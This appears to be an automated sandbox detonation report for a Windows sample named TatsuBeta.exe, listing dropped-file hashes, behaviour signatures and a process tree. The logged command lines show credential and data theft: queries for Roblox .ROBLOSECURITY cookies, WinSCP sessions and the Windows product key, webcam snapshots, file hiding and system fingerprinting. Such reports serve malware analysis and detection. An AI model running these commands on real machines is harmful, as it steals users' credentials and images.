C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources.pak

MD5 c0d714e8e717aaf611448d49e98a8ab4
SHA1 1d63f0faef0c2b8ef76653f5aab17916bc6e1cd9
SHA256 7f0aa4d14d9dc0c035a2112abe32c0fa743366de66ea002813d8d6ed884c7780
SHA512 95e892e0ab62880839db98efcb4dabd9509161515015e4bca8d8eafd9e4f6574c51b7414459bef8f51ec4e9749ae10a466c48779d34592a4b362120b98cf921b

memory/5032-578-0x00007FF994C20000-0x00007FF994C21000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 ff759bc2ddf4606f475f6042db0ce54c
SHA1 4b864f2b6f3ff1ae2dd2d3fce4b51be216d895b5
SHA256 09f1491e72b38d60589616e2cd4a9ff736c30101d76cf64e247b0cf113357f66
SHA512 732792b0729ed1564f70c724fdd9d63c9cca14e4df23bf1a40c83f4f1a50ad289172443887974556e268bb5c01676bdbdd0907f3b02ecd5505f6518e647e7096

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 72dccee282275b1cadc6cdf14a15d766
SHA1 59ae2a24128371c0b9d7664724118961067bca94
SHA256 59458e2bb43a309c7bb6910c4990afc76a9ffcfeae0ff93ea2ba5d6f844fd412
SHA512 b7cd8f3aa64a93c2a314974d955019620b7b0e5b88cda9e5478a20248fa36557d81fceb89b82122633081c899b087e4ee2be7dfc8e85fe24c32f8234416f3d24

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libglesv2.dll

MD5 efb2d43d109b028ed69026e3898ab7dc
SHA1 511127d658beecde5be42d28bc9d1bb7bd9feb9e
SHA256 5743bfbc995adfee17cdf5455261c380cf240edb3b7ddc8ea4ae16301dc3d8fa
SHA512 39895b67ee081699f97e941a255f8f55f921c1d527d50454361f7dcdebec9f19d18bf0eec199358e6879a105330d614f6615d114deb3697deef24b8666604d21

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\d3dcompiler_47.dll

MD5 c1e9c5d58adb8f91dcd9793520676b14
SHA1 422e28f2ed9cdd55b21d52a9cf09084f1a987d34
SHA256 95b01b5c8cf10a4411f103babdbb19f20504b6b5198828a78337251ddaadf6ed
SHA512 63395fcb7fef1b4764359ed76b4982b4062b2fb0f2bbe7d104154d428237e0077248e9b172ce20a3b7a705439a11bf11d628105ee4c6ec1b020140368b353265

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 7f32af4fe4c5e8e1c3a12d81156e2a45
SHA1 924717c6c5b9c786b970a3f14d162c52c2374790
SHA256 754120d1e1cd4153dad81f89ecb1cda9b1501f9bf0632272c0af2acd32d46240
SHA512 4aa28b9bdef18f0e41b9feef7786964e74a552547de7050f8246f09f22fa5f7bc88137b00aaca4a2dc3bf69d7b1a192b144112f509489236371ea5570595dfa3

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 bffd88be230e662bf4d2e09e1d37d304
SHA1 52a1afb8298698a548001f6902e3705192db4876
SHA256 96fc1c4a83066f0d8c5039c721a6c85dd6e52709b027d36d984fdcb70356bd79
SHA512 137c71865632a6b4506b618c62ad838368aa228e1e559da17032196b71140525d61ad5bd26ab92992d42a0c9444287244a6945b5b7b11ea9ce7d5234f94d6fac

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libGLESv2.dll

MD5 8a009363a6560f059ee9174d52c74eff
SHA1 84d9e44d240c77259dd0af989ccfb074f50cde68
SHA256 620190d1cf65f4d74a0d7bf3f5ef0e422f0cf205f44edcfc2cafcc2fb236b340
SHA512 651085008718daea4d480dad71cda2467314e9318531cbd82fb3f93f7beee17f1d67ed2c6a1ea9567397b522a7707c502d61069996787888f5baa3d044d0699a

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\D3DCompiler_47.dll

MD5 cfc37540ff3ac356e0b0fbddbf1593f8
SHA1 fd8069d470aa7c9057f87ad11ec3f957bf4e4261
SHA256 f545c764dff40c730b946550a3bf2f9f9dd9a076853918c452a62445e1287853
SHA512 bfdac2bc267249a20b382e467fcb4ba913e70a938bdeaf0b0761eaa685e5f2cadabcb80bdfa4423d80d5e07f17ef80f23c4bf7e493f6330cee22b6209c7eff5c

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 4231004693f4daf0f58fd0d312673d47
SHA1 d6d7cc4f07d94cb0e3cf3888d3d1778879f4e5b8
SHA256 a025b93acadab070e395dd86a2fac817cb18c1f080d4bbef3acb2407e8c7e144
SHA512 38352f518615fe82d018542a0e7f139c8be5e6ba3bd19a5e6f748ab1d47a66302e4c8c3554c8e7d9cabca97c46bc946d501b864247e6d3f1f075107e1ccff00a

memory/5032-593-0x00000275B4E50000-0x00000275B4EEB000-memory.dmp

memory/1576-604-0x000001DBD89E0000-0x000001DBD8A02000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_re3vudhj.m1h.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1576-614-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

memory/1576-616-0x000001DBC0290000-0x000001DBC02A0000-memory.dmp

memory/1576-617-0x000001DBC0290000-0x000001DBC02A0000-memory.dmp

memory/1576-621-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

memory/3296-631-0x0000028A6C3D0000-0x0000028A6C3E0000-memory.dmp

memory/3296-630-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

memory/3296-633-0x0000028A6C3D0000-0x0000028A6C3E0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a6c9d692ed2826ecb12c09356e69cc09
SHA1 def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256 a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA512 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

memory/3296-638-0x0000028A6C3D0000-0x0000028A6C3E0000-memory.dmp

memory/3296-641-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

memory/4416-647-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

memory/4416-648-0x000002739FBD0000-0x000002739FBE0000-memory.dmp

memory/4416-649-0x000002739FBD0000-0x000002739FBE0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

memory/4416-660-0x000002739FBD0000-0x000002739FBE0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe

MD5 7af06309cd9378d4472dc4ceb5c72a1e
SHA1 78da756bb7e9cd754bed3d7e7ab01597718f27f4
SHA256 6a755c998bab381de85dfbedb4014dc630919e35a2eb4382c1e659136b6a7a0b
SHA512 7d289c7c3d526926dcb4a544c9650f3286d2759606fa879c047437de51fb3bc9552330d0d62a653effc749debda35cbbdd25d386b0b6b84739ec327a2a55620c

memory/4416-663-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

memory/6400-666-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

memory/6400-667-0x000002DA35E90000-0x000002DA35EA0000-memory.dmp

memory/6400-668-0x000002DA35E90000-0x000002DA35EA0000-memory.dmp

memory/6400-679-0x000002DA35E90000-0x000002DA35EA0000-memory.dmp

memory/6400-681-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

memory/7908-683-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

memory/7908-686-0x000001E9B7690000-0x000001E9B76A0000-memory.dmp

memory/7908-685-0x000001E9B7690000-0x000001E9B76A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e5ea61f668ad9fe64ff27dec34fe6d2f
SHA1 5d42aa122b1fa920028b9e9514bd3aeac8f7ff4b
SHA256 8f161e4c74eb4ca15c0601ce7a291f3ee1dc0aa46b788181bfe1d33f2b099466
SHA512 cb308188323699eaa2903424527bcb40585792f5152aa7ab02e32f94a0fcfe73cfca2c7b3cae73a9df3e307812dbd18d2d50acbbfeb75d87edf1eb83dd109f34

memory/7908-698-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\places.sqlite_tmp

MD5 f68d8310b1ef8a0991d7a1f85d37261b
SHA1 e70a54a60499893060cf7c00a222730e1dbe7a9b
SHA256 f1ace1d4cc8a8eb921913ae1ffcfbbaaca2a6010fc92874d820a758b2f0a15c5
SHA512 2fe9bf23922532072d83bce70e35eb2f1792f0ea3d4594ca115fc8b2a8f79cd60c3f39bbf2cb3be92916f5cb5f2801342281ad35a86551db99d4a2b4938a17dc

memory/3576-745-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

memory/3576-746-0x00000238D3E00000-0x00000238D3E10000-memory.dmp

memory/3576-747-0x00000238D3E00000-0x00000238D3E10000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9e4a16108b342d8f1cfb8c568d47da3b
SHA1 3aeeb65f8995f63853ca6167c122accd3bada9ab
SHA256 078ce4af1881e1e48657bd1e9b778bdd8e38ee16685f9029e2da68bd346d133b
SHA512 66b84f1d15751ad6ab01b3dbe41dbb1ef0fa1f199a91554e234573bf433856bb95677d930e1df63c2309ecaeabd38d96b79764120d607f8dc0265b3460b9c852

memory/3576-758-0x00000238D3E00000-0x00000238D3E10000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_WJwS5S.vbs

MD5 e4e954c219eacb434bc9d9f52a39bf6d
SHA1 d7ad50c08d4180073695245dc72b3ffab05054e5
SHA256 787f0f87d8ec05c71591d5445763b0717a2c9ad89ec3e472602d1da88b9d4464
SHA512 cef89b68d78964284136179ca0aa3a685dd32313af5fc29befc46d92ea726c038936a15880d8b298c42284618db334b7f68884e1f6832592f9918faeba086c62

memory/3576-761-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

memory/7256-795-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

memory/7256-796-0x00000230EB070000-0x00000230EB080000-memory.dmp

memory/7256-797-0x00000230EB070000-0x00000230EB080000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 15d8e3386f7a8f0c4c3ee7a36b408d13
SHA1 fb67b9fe60f40448a6bce96f68ace1201f5a79de
SHA256 433074a36d596b6a958180680d0ddb88c26d5a3874e64a4a2a94de98b0ae1c6a
SHA512 fb5b4b3f4777f0dbcf954715a076c002bb1ba4b614e4527574eef9d094badedc377ecdb0a7b7cd488a0ea98feff225e5e0c1a96ab678042806a3536e14459e90

C:\Users\Admin\AppData\Roaming\salut4Qld0.ps1

MD5 28e4eda7451c625bbe806b745753f729
SHA1 d29e9b2c2ac5b10188cbae92cffba6827728543d
SHA256 da79e10cdff90aa7f5ab3d3f226570107ecd20d48eb14067c7900367111df5ba
SHA512 932f53b6cd2aa55ab1475d85528069357fa7d9eea26051d1a4edb11872ca30d02c31c44bed3a48f0ccdbebe556e9d8ec2f4a0815bf177d93ab4272b3fe2fb0b5

memory/7256-811-0x00007FF974B20000-0x00007FF9755E1000-memory.dmp

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo.png

MD5 2b67e47cb8da1058770fe41d8b947619
SHA1 9eb259b1d377a24a2b77a694cf31c23cef7b8eef
SHA256 46f616820751849512d2704ddb604666170d13315c4383b8c8611c3e1c2f594a
SHA512 27c0593d662df228e146c49af6da52e39523523af924cf95ba4890b1b42358b2b8df3cf2667d8f672eece4f7fe098574c4689677768dd54d3b872619c7b9ae55

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo16.png

MD5 f0f11cd478cc44d518c16820ede9d253
SHA1 cfaf8d2e071f2ade0894578e5b44e02032d27be4
SHA256 321695dbcac7b2ceb14ef2651705ead5c0c42815358082b758ee803a37e945bb
SHA512 ac736abf8a776918df4094929efc29f7ae643aeef8d9b464653e3b7272a0799e58dc961dacadfbf9f42f575dfba14df7e6f4b1256c2c83dfe333ffb2ed3a1de8

C:\ProgramData\ChromeExtensionsNova\extension-cookies\manifest.json

MD5 04c23766134b234e85cc537b2162efb1
SHA1 45c48d9ca30a4580a682f025cc66331e49f6f158
SHA256 f50f62683347bbca52d7f7de0c877014ae77043753905628644e2d485dfb4900
SHA512 d246f59ad6d6e9fc8d8d88129302d55cb3d2ba7d52496915ee6791fa0576153070af76ea689cc74ccefc36456df749ac5c8f45cb12702961470f202078bfcb3c

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo48.png

MD5 9f74f11972c3c0b161832ffab541bf31
SHA1 e5841ba20a229cdeab85d30690509e649e848271
SHA256 8b74a0abdd566ffdf15891d6abd3537bffb0abce7f362c737c3de6752e136032
SHA512 b90f13eb65a4dcfdd596a7d9eba7c1ba5eb1a598e51107ce3dca07c0a0025469ab18c9958eff2b36f7e05a23f0d16d7d9d7c2321b8e1f2a456aaa7bec3ced0e8

C:\ProgramData\ChromeExtensionsNova\extension-tokens\js\jquery-3.5.1.min.js

MD5 9ac39dc31635a363e377eda0f6fbe03f
SHA1 29fa5ad995e9ec866ece1d3d0b698fc556580eee
SHA256 9a2723c21fb1b7dff0e2aa5dc6be24a9670220a17ae21f70fdbc602d1f8acd38
SHA512 0799ae01799707b444fca518c3af9b91fda40d0a2c114e84bc52bd1f756b5e0d60f6fd239f04bd4d5bc37b6cdbf02d299185cd62410f2a514a7b3bd4d60b49fc

C:\ProgramData\ChromeExtensionsNova\extension-tokens\manifest.json

MD5 42ac88deb5c3cfc02fdc1c27319ee067
SHA1 97b1addf35159800b90743fcfbb5505e80f6eb82
SHA256 28486361faff1827fb9f1871529c48efaaf86027592d189afa6f99b14eb3f4bb
SHA512 77c4054a3cf061eb6f4f6e9803b74833a8fb0fe352239b5b47cf39ea5eea8104b9da6deab75018557476fbda856f3be8d57e6fe2eb777c45a7a1bdb1e72d02d5

Analysis: behavioral4

Detonation Overview

Submitted

2023-12-17 13:47

Reported

2023-12-17 13:51

Platform

win11-20231215-en

Max time kernel

5s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe"

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

C:\Windows\system32\tasklist.exe

tasklist

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1448 --field-trial-handle=1684,16488817615885489717,17376577024114886649,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1916 --field-trial-handle=1684,16488817615885489717,17376577024114886649,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=4996 get ExecutablePath

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources\app.asar.unpacked\bind\main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=4996 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get size

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\more.com

more +1

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=4996 get ExecutablePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\"""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\snapshot.exe" /T C:\Users\Admin\AppData\Local\Temp\r1kB0zLVK2l9POWbEjWi\System\cam.2100_Admin"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe" -invalid youcam,cyberlink,google -frame 10 -outfile C:\Users\Admin\AppData\Local\Temp\r1kB0zLVK2l9POWbEjWi\System\cam.2100_Admin.jpg"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

